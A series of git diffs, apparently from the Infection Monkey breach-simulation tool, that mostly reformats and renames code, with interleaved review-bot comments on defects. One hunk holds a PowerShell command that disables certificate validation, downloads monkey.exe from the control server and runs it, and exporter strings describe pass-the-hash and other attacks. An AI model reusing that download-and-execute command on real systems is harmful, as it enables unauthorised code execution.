a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py 
@@ -84,7 +84,7 @@ class TestMonkey(IslandTestCase): self.clean_monkey_db() linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64") + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") unknown_monkey = Monkey(guid=str(uuid.uuid4()), diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index d7cae8bd7..59a8fbe7c 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -1,18 +1,18 @@ -from datetime import datetime import logging import threading +from datetime import datetime import flask_restful from flask import request, make_response, jsonify from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo +from monkey_island.cc.services.database import Database from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from monkey_island.cc.services.attack.attack_report import AttackReportService -from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, safe_generate_reports +from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \ + safe_generate_reports from monkey_island.cc.utils import local_ip_addresses -from monkey_island.cc.services.database import Database __author__ = 'Barak' diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index f88b7e8b9..1c18f7654 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py 
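Review bot: In the root.py hunk the import of `AttackReportService` from `monkey_island.cc.services.attack.attack_report` is removed and not re-added, whereas every other moved import reappears in the new order; if any handler in root.py still references that name the failure surfaces only when the route is hit, not at import time. Presumably the import was unused, but nothing on the page confirms it, and an unused-import removal deserves a mention alongside a reordering commit so that a reviewer does not have to re-derive it.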
@@ -75,7 +75,10 @@ class AttackReportService: Gets timestamp of latest attack telem :return: timestamp of latest attack telem """ - return [x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)][0] + return [ + x['timestamp'] for x in + mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + ][0] @staticmethod def get_latest_report(): diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 2d38b6498..09771302d 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -122,11 +122,16 @@ class ConfigService: @staticmethod def ssh_add_keys(public_key, private_key, user, ip): - if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], - False, False), user, ip): - ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys', - {"public_key": public_key, "private_key": private_key, - "user": user, "ip": ip}) + if not ConfigService.ssh_key_exists( + ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], False, False), user, ip): + ConfigService.add_item_to_config_set( + 'internal.exploits.exploit_ssh_keys', + { + "public_key": public_key, + "private_key": private_key, + "user": user, "ip": ip + } + ) @staticmethod def ssh_key_exists(keys, user, ip): diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 77b6d95ea..4ec1fd427 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py 
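Review bot: The method in the attack_report.py hunk (its docstring reads "Gets timestamp of latest attack telem"; the `def` line is outside the hunk) still indexes `[0]` into the list built from `.limit(1)`, so when no telemetry with `telem_category: 'attack'` exists the call raises `IndexError` instead of reporting the absence; since the expression is being rewritten anyway, `return next((x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)), None)` returns `None` on an empty collection and avoids materialising the list. Callers would then need to handle `None`, which this page does not show.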
@@ -131,7 +131,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 8690f6ee1..f0b6bdb6a 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -148,8 +148,8 @@ class AWSExporter(Exporter): severity=5, title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", - recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}" - .format(issue['machine'], issue['dest']), + recommendation="Machines are not locked down at port level. " + "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -160,10 +160,12 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Samba servers are vulnerable to 'SambaCry'", - description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \ - .format(issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0} password to a complex one-use password that is not shared with other computers on the " + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -174,10 +176,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " + "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -188,10 +190,11 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH" + " protocol with user {2} and its " + "password.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -203,8 +206,11 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), - recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']), + recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -216,8 +222,10 @@ class AWSExporter(Exporter): severity=10, title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", - recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], issue['ip_address']), + recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -228,13 +236,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", - description="Segment your network and make sure there is no communication between machines from different segments.", + description="Segment your network and make sure there is no communication between machines from different " + "segments.", recommendation="The network can probably be segmented. A monkey instance on \ {0} in the networks {1} \ could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], issue['networks'], - issue[ - 'server_networks']), + issue['server_networks']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -259,8 +267,9 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -271,10 +280,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password.".format( + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -285,9 +297,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.", - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.", + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " + "the WMI protocol with user {username} and its password.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
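Review bot: The rewritten `description` in this aws_exporter.py hunk (`"Change {0}'s password ... on the " "network.",`) still has no `.format(...)` call, so the finding is exported with a literal `{0}` where the username belongs; the next hunk (`@@ -298,10 +314,13 @@`) formats the same text with `issue['username']` and this one should too. In both this hunk and the next, `recommendation` reads `"The machine machine ({ip_address}) is vulnerable to a WMI attack..."` while `machine=issue['machine']` is passed to `.format` and never consumed — the intended text is `"The machine {machine} ({ip_address}) is vulnerable to a WMI attack. ..."`. Both defects predate the commit, but the commit rewrote exactly these lines and kept them.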
@@ -298,10 +314,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -325,9 +344,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.", - recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format( - username=issue['username'], shared_machines=issue['shared_machines']), + description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " + "an unintentional local admin sharing.", + recommendation="Here is a list of machines which the account {username} is defined as an administrator: " + "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -339,8 +359,9 @@ class AWSExporter(Exporter): severity=1, title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", - recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + recommendation="The services: {services} have been found on the machine thus classifying it as a critical " + "machine. These users has access to it:{threatening_users}.".format( + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -353,8 +374,8 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -368,8 +389,8 @@ class AWSExporter(Exporter): description="Install Oracle critical patch updates. Or update to the latest version. " \ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 5e77b6395..ecb209c69 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py 
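Review bot: The re-wrapped `recommendation` strings in both aws_exporter.py hunks here (`@@ -353` Struts2 and `@@ -368` WebLogic) drop the leading space the removed lines had before `The attack was made possible`, so the exported text now reads `...remote code execution attack.The attack was made...`; restore it either as `"... is vulnerable to remote code execution attack. "` on the first literal or `" The attack was made possible ..."` on the second. Every other re-wrapped finding in this file keeps a separator space at each split point, so these two are the outliers.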
@@ -30,7 +30,6 @@ class PTHReportService(object): } """ - pipeline = [ {"$match": { 'NTLM_secret': { @@ -55,7 +54,7 @@ class PTHReportService(object): :param admin_on_machines: A list of "monkey" documents "_id"s :param domain_name: The admins' domain name :return: - A list of formatted machines names *domain*\*hostname*, to use in shared admins issues. + A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. """ machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) return [domain_name + '\\' + i['hostname'] for i in list(machines)] @@ -108,7 +107,7 @@ class PTHReportService(object): 'username': user['name'], 'domain_name': user['domain_name'], 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if user['machine_id'] else None - } for user in doc['Docs'] + } for user in doc['Docs'] ] users_cred_groups.append({'cred_groups': users_list}) @@ -144,7 +143,8 @@ class PTHReportService(object): { 'name': admin['name'], 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], admin['domain_name']) + 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], + admin['domain_name']) } for admin in admins ] @@ -153,11 +153,11 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + 'is_local': False, + 'type': 'shared_admins_domain', + 'machine': admin['domain_name'], + 'username': admin['domain_name'] + '\\' + admin['name'], + 'shared_machines': admin['admin_on_machines'], } for admin in admins_info] 
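Review bot: The docstring now says machine names are formatted as `*domain*/*hostname*`, but the return line two lines below still joins with a backslash (`domain_name + '\\' + i['hostname']`), so the documentation and the code disagree. Presumably the edit was made to get rid of the invalid `\*` escape in a non-raw string; writing `*domain*\\*hostname*` (or making the docstring a raw string) keeps the warning away and the text accurate. The method's signature is above the hunk.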
@@ -262,7 +262,7 @@ class PTHReportService(object): return { 'nodes': PTHReportService.generate_map_nodes(), 'edges': PTHReportService.generate_edges() - } + } @staticmethod def get_report(): @@ -283,4 +283,3 @@ class PTHReportService(object): } return report - diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index cf59ae7df..58dff1f5a 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -65,11 +65,18 @@ def local_ip_addresses(): # The subnets list should not change often. Therefore, we can cache the result and never call this function # more than once. This stopgap measure is here since this function is called a lot of times during the report # generation. -# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. +# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. @lru(maxsize=1) def get_subnets(): subnets = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - subnets.extend([ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network for link in addresses if link['addr'] != '127.0.0.1']) + subnets.extend( + [ + ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network + for link + in addresses + if link['addr'] != '127.0.0.1' + ] + ) return subnets From 4b0ea4aed7629636158eb729cc112e56aa6cd904 Mon Sep 17 00:00:00 2001 
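Review bot: In the reflowed `get_subnets` comprehension `link['netmask']` is indexed unconditionally; netifaces does not guarantee a `netmask` key for every AF_INET entry (point-to-point or partially configured interfaces are the usual case — to be confirmed), and one missing key raises KeyError, which, since the function is wrapped in `@lru(maxsize=1)` and called during report generation, would fail every report until the process is restarted. Skipping such entries in the comprehension's filter, `if link.get('netmask') and link['addr'] != '127.0.0.1'`, avoids that. Note also that only the exact address `127.0.0.1` is excluded, so any other loopback-range address an interface reports still lands in the cached subnet list.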
From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:31 +0200 Subject: [PATCH 25/44] Variable names and const location fixes --- monkey/infection_monkey/control.py | 2 +- monkey/infection_monkey/dropper.py | 5 +++-- monkey/infection_monkey/network/firewall.py | 6 +++--- monkey/infection_monkey/network/info.py | 11 +++++------ monkey/infection_monkey/transport/http.py | 10 ++++------ monkey/monkey_island/cc/environment/environment.py | 4 ++-- monkey/monkey_island/cc/models/monkey.py | 2 +- monkey/monkey_island/cc/services/config.py | 12 ++++++------ monkey/monkey_island/cc/services/edge.py | 6 +++--- monkey/monkey_island/cc/services/node.py | 6 +++--- 10 files changed, 31 insertions(+), 33 deletions(-) diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 54d528976..b063744ad 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -304,7 +304,7 @@ class ControlClient(object): try: target_addr, target_port = my_proxy.split(':', 1) target_port = int(target_port) - except: + except ValueError: return None else: proxy_class = HTTPConnectProxy diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index ee1194035..0fc6dd10a 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -26,6 +26,7 @@ else: try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = IOError __author__ = 'itamar' @@ -103,14 +104,14 @@ class MonkeyDrops(object): dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) - except OSError as exc: + except OSError: LOG.warning("Cannot set reference date using '%s', file not found", dropper_date_reference_path) else: try: os.utime(self._config['destination_path'], (ref_stat.st_atime, ref_stat.st_mtime)) - except: + except OSError: LOG.warning("Cannot set reference date to destination file") monkey_options =\ 
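Review bot: Narrowing the handler in `control.py` to `except ValueError:` covers a `my_proxy` without a `:` and a non-numeric port, but no longer covers an `AttributeError` if `my_proxy` can be `None` or a non-string here; where `my_proxy` comes from is outside the hunk, so this needs confirming against the enclosing method. If `None` is possible, guard before the split (`if not my_proxy: return None`) rather than widening the except again. The enclosing method starts and ends outside the hunk.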
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 06d98dcbd..3b0161bbb 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -25,7 +25,7 @@ class FirewallApp(object): def __enter__(self): return self - def __exit__(self, type, value, traceback): + def __exit__(self, exc_type, value, traceback): self.close() def close(self): @@ -49,9 +49,9 @@ class WinAdvFirewall(FirewallApp): except: return None - def add_firewall_rule(self, name="Firewall", dir="in", action="allow", program=sys.executable, **kwargs): + def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): netsh_args = {'name': name, - 'dir': dir, + 'dir': direction, 'action': action, 'program': program} netsh_args.update(kwargs) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index cc198312c..2d7b981f5 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,6 +16,11 @@ from infection_monkey.utils.environment import is_windows_os # Timeout for monkey connections TIMEOUT = 15 +LOOPBACK_NAME = b"lo" +SIOCGIFADDR = 0x8915 # get PA address +SIOCGIFNETMASK = 0x891b # get network PA mask +RTF_UP = 0x0001 # Route usable +RTF_REJECT = 0x0200 def get_host_subnets(): @@ -62,12 +67,6 @@ else: def get_routes(): # based on scapy implementation for route parsing - LOOPBACK_NAME = b"lo" - SIOCGIFADDR = 0x8915 # get PA address - SIOCGIFNETMASK = 0x891b # get network PA mask - RTF_UP = 0x0001 # Route usable - RTF_REJECT = 0x0200 - try: f = open("/proc/net/route", "r") except IOError: diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..7650cb229 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py 
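Review bot: Renaming the keyword parameter `dir` to `direction` in `add_firewall_rule` changes the method's public signature; a caller that passes `dir=` by keyword now routes that value through `**kwargs` into `netsh_args` via the `update(kwargs)` call, which happens to produce the same netsh argument but only by accident. The call sites are outside this patch, so they should be checked for `dir=` and updated. Separately, the `except: return None` visible in the hunk's leading context is still a bare except; narrowing it to the exception the wrapped call actually raises (the try body is above the hunk) would match what this commit does elsewhere.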
@@ -64,7 +64,6 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 - f = None try: f = monkeyfs.open(self.filename, 'rb') except IOError: @@ -100,10 +99,10 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.end_headers() return f, start_range, end_range - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), self.log_date_time_string(), - format % args)) + format_string % args)) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): @@ -117,7 +116,6 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): def do_CONNECT(self): # just provide a tunnel, transfer the data with no modification req = self - reqbody = None req.path = "https://%s/" % req.path.replace(':443', '') u = urlsplit(req.path) @@ -148,9 +146,9 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): update_last_serve_time() conn.close() - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format % args)) + (self.address_string(), self.log_date_time_string(), format_string % args)) class HTTPServer(threading.Thread): diff --git a/monkey/monkey_island/cc/environment/environment.py b/monkey/monkey_island/cc/environment/environment.py index 6115e8dd9..868e6ec36 100644 --- a/monkey/monkey_island/cc/environment/environment.py +++ b/monkey/monkey_island/cc/environment/environment.py 
@@ -34,8 +34,8 @@ def load_server_configuration_from_file(): def load_env_from_file(): - config_json = load_server_configuration_from_file() - return config_json['server_config'] + loaded_config_json = load_server_configuration_from_file() + return loaded_config_json['server_config'] try: diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 1a0e872f6..c257ae298 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -132,7 +132,7 @@ def is_monkey(object_id): try: _ = Monkey.get_single_monkey_by_id(object_id) return True - except: + except MonkeyNotFoundError: return False diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 09771302d..641da8055 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -144,7 +144,7 @@ class ConfigService: if should_encrypt: try: ConfigService.encrypt_config(config_json) - except KeyError as e: + except KeyError: logger.error('Bad configuration file was submitted.') return False mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) @@ -154,9 +154,9 @@ class ConfigService: @staticmethod def init_default_config(): if ConfigService.default_config is None: - defaultValidatingDraft4Validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) config = {} - defaultValidatingDraft4Validator(SCHEMA).validate(config) + default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @staticmethod 
@@ -207,15 +207,15 @@ class ConfigService: # Do it only for root. if instance != {}: return - for property, subschema in list(properties.items()): + for property1, subschema1 in list(properties.items()): main_dict = {} - for property2, subschema2 in list(subschema["properties"].items()): + for property2, subschema2 in list(subschema1["properties"].items()): sub_dict = {} for property3, subschema3 in list(subschema2["properties"].items()): if "default" in subschema3: sub_dict[property3] = subschema3["default"] main_dict[property2] = sub_dict - instance.setdefault(property, main_dict) + instance.setdefault(property1, main_dict) for error in validate_properties(validator, properties, instance, schema): yield error diff --git a/monkey/monkey_island/cc/services/edge.py b/monkey/monkey_island/cc/services/edge.py index bf9417309..b026fa480 100644 --- a/monkey/monkey_island/cc/services/edge.py +++ b/monkey/monkey_island/cc/services/edge.py @@ -141,7 +141,7 @@ class EdgeService: @staticmethod def get_edge_label(edge): - NodeService = monkey_island.cc.services.node.NodeService + node_service = monkey_island.cc.services.node.NodeService from_id = edge["from"] to_id = edge["to"] @@ -153,9 +153,9 @@ class EdgeService: if is_monkey(to_id): to_label = get_monkey_label_by_id(to_id) else: - to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id)) + to_label = node_service.get_node_label(node_service.get_node_by_id(to_id)) - RIGHT_ARROW = "\u2192" return "%s %s %s" % (from_label, RIGHT_ARROW, to_label) +RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 0c0a873e8..da45509d7 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py 
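Review bot: `RIGHT_ARROW = "\u2192"` in `edge.py` is now a module-level constant but is appended after the `EdgeService` class at the very end of the file, away from the imports and any other module-level names; it works because `get_edge_label` reads it at call time, but it is easy to miss there. Move it up next to the module's other top-level definitions, above the class. The lowercased alias `node_service` in the first `edge.py` hunk also reads like an instance even though it is bound to the `NodeService` class; `get_edge_label` continues between and after the two hunks.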
